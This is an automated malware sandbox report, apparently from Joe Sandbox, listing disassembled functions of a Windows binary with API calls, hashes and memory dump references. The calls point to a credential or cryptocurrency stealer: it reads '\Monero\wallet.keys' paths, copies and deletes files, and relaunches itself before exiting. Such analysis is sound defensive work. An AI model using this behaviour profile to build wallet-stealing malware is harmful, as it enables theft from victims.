                          Download Yara Rule
                          APIs
                          • StrStrA.SHLWAPI(00840438,?,?,?,00DF140C,?,00840438,00000000), ref: 00DF926C
                          • lstrcpyn.KERNEL32(0102AB88,00840438,00840438,?,00DF140C,?,00840438), ref: 00DF9290
                          • lstrlen.KERNEL32(?,?,00DF140C,?,00840438), ref: 00DF92A7
                          • wsprintfA.USER32 ref: 00DF92C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          • Opcode ID: 91ce0953d57380e27a286d4b034ed0ea4140ced4c64d86d4f8385fa8e26671b8
                          • Instruction ID: 40c51b99f1894864d777b22474b0526c01cf0531ced158a6fb179e6848f95870
                          • Opcode Fuzzy Hash: 91ce0953d57380e27a286d4b034ed0ea4140ced4c64d86d4f8385fa8e26671b8
                          • Instruction Fuzzy Hash: F0011E75600108FFCB14DFECC998EAE7BB9FB48350F108548F9499B605CA35AA40DBA4
                          Function 00DE12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DE12B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DE12BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00DE12D7
                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00DE12F5
                          • RegCloseKey.ADVAPI32(?), ref: 00DE12FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 347fee172138133ea493035e84db50dff061a1cd8c7d4fc61951048300d8326e
                          • Instruction ID: c31e0a8df0abaa9e233cad42ab802e30a7175c24ac536780b93c80fe4df52ac5
                          • Opcode Fuzzy Hash: 347fee172138133ea493035e84db50dff061a1cd8c7d4fc61951048300d8326e
                          • Instruction Fuzzy Hash: AD011DB9B40208FBDB24DFE0DC49FAEB7B8FB48701F108159FA4597284DA759A018B60
                          Function 00DFC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Type
                          • String ID:
                          • API String ID: 2109742289-3916222277
                          • Opcode ID: 125ecb3d635e4ff94a4576300da96bcddad17f72e516cbb62038592c750a1301
                          • Instruction ID: 8aee07532886655cfbb0e18d5f7c7aa1de1e5bd1c5f415532c55ba9e65f897cf
                          • Opcode Fuzzy Hash: 125ecb3d635e4ff94a4576300da96bcddad17f72e516cbb62038592c750a1301
                          • Instruction Fuzzy Hash: C541F6B111075C5EDB218B24CE84FFB7BE99F45705F1894E8EACA86182E2719A94CF30
                          Function 00DF6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00DF6663
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00DF6726
                          • ExitProcess.KERNEL32 ref: 00DF6755
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          • Opcode ID: 4b85860e5a04faa85828634e2081da7c2e58f0b2f1b13c2116b88843e069b3d0
                          • Instruction ID: eaea38f9a2cad76c5e96ffe745a4c15e11ac327263ecd3edf6d24ad713b7caaa
                          • Opcode Fuzzy Hash: 4b85860e5a04faa85828634e2081da7c2e58f0b2f1b13c2116b88843e069b3d0
                          • Instruction Fuzzy Hash: E3310AB1901218AADB24EB54DC91BEE7778EF44300F808199F30966191DFB56B48CF7A
                          Function 00DF87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E00E28,00000000,?), ref: 00DF882F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF8836
                          • wsprintfA.USER32 ref: 00DF8850
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: 6e0e4ecb755c00295438930d2f0f2a282c3e7f3a3d053f78b3ba32c6f67aead8
                          • Instruction ID: 77d5cc744c96cfec6a11752746254147416178e706ba7440c2b8e31acdfd5235
                          • Opcode Fuzzy Hash: 6e0e4ecb755c00295438930d2f0f2a282c3e7f3a3d053f78b3ba32c6f67aead8
                          • Instruction Fuzzy Hash: 3C2133B1F40208EFDB24DF94DD45FAEB7B8FB48711F204119F605A7684CB7999008BA1
                          Function 00DF8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00DF951E,00000000), ref: 00DF8D5B
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF8D62
                          • wsprintfW.USER32 ref: 00DF8D78
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          • Opcode ID: 0b1b56de4916ac1b6a02cc04570240e3ae51afa4adf4af32d8ad99ce0931871d
                          • Instruction ID: 1b0e725390b8b74671ef17ac4fc932e442e87b5a7eeaf470ae395b1bb6f23051
                          • Opcode Fuzzy Hash: 0b1b56de4916ac1b6a02cc04570240e3ae51afa4adf4af32d8ad99ce0931871d
                          • Instruction Fuzzy Hash: F6E08CB0B40208FBD724DF94DC0AE6977B8EB04702F104095FE4A97680DEB69E008BA5
                          Function 00DEA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                            • Part of subcall function 00DF8B60: GetSystemTime.KERNEL32(00E00E1A,0083FC00,00E005AE,?,?,00DE13F9,?,0000001A,00E00E1A,00000000,?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DF8B86
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DEA2E1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 00DEA3FF
                          • lstrlen.KERNEL32(00000000), ref: 00DEA6BC
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                          • DeleteFileA.KERNEL32(00000000), ref: 00DEA743
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 86bbecd727f6926a560c3337923cac820a5a59ab6645df2d526272531e79aae9
                          • Instruction ID: 3a90e1082d0ba82b479ca769ea72f42bc577f3e666d0cb0dc85711e654eea5a1
                          • Opcode Fuzzy Hash: 86bbecd727f6926a560c3337923cac820a5a59ab6645df2d526272531e79aae9
                          • Instruction Fuzzy Hash: 8EE1FBB291011C9ACB14FBA8DC92EFE7338EF14340F51C169F61A76095EE746A49CB72
                          Function 00DED400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                            • Part of subcall function 00DF8B60: GetSystemTime.KERNEL32(00E00E1A,0083FC00,00E005AE,?,?,00DE13F9,?,0000001A,00E00E1A,00000000,?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DF8B86
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DED481
                          • lstrlen.KERNEL32(00000000), ref: 00DED698
                          • lstrlen.KERNEL32(00000000), ref: 00DED6AC
                          • DeleteFileA.KERNEL32(00000000), ref: 00DED72B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: c9f1af44e29dd47cbbbdcdc94c602c5034321782d3659a07a35c767b23a27f38
                          • Instruction ID: 35049f0ea5961abe0890f602429eb4003559a612b89bd1cb4fb59979a702bfb2
                          • Opcode Fuzzy Hash: c9f1af44e29dd47cbbbdcdc94c602c5034321782d3659a07a35c767b23a27f38
                          • Instruction Fuzzy Hash: AF910FB191011C9ACB14FBA8DC96DFE7338EF14300F51C169F61AA6095EF746A09CB72
                          Function 00DED780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                            • Part of subcall function 00DF8B60: GetSystemTime.KERNEL32(00E00E1A,0083FC00,00E005AE,?,?,00DE13F9,?,0000001A,00E00E1A,00000000,?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DF8B86
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DED801
                          • lstrlen.KERNEL32(00000000), ref: 00DED99F
                          • lstrlen.KERNEL32(00000000), ref: 00DED9B3
                          • DeleteFileA.KERNEL32(00000000), ref: 00DEDA32
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 757336a909d840892d96cf035e55d6499dd52495af3dbb58fbaf7f99443e978d
                          • Instruction ID: 894a40f8a613dd5edcddb581b598285d71ef63565b32c5320e311f8b7f7c0b70
                          • Opcode Fuzzy Hash: 757336a909d840892d96cf035e55d6499dd52495af3dbb58fbaf7f99443e978d
                          • Instruction Fuzzy Hash: 12810FB191011C9ACB14FBA8DC96DFE7338EF54340F55C129F60AA6095EF746A09CB72
                          Function 00DEF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                            • Part of subcall function 00DE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DE99EC
                            • Part of subcall function 00DE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DE9A11
                            • Part of subcall function 00DE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DE9A31
                            • Part of subcall function 00DE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DE148F,00000000), ref: 00DE9A5A
                            • Part of subcall function 00DE99C0: LocalFree.KERNEL32(00DE148F), ref: 00DE9A90
                            • Part of subcall function 00DE99C0: CloseHandle.KERNEL32(000000FF), ref: 00DE9A9A
                            • Part of subcall function 00DF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DF8E52
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
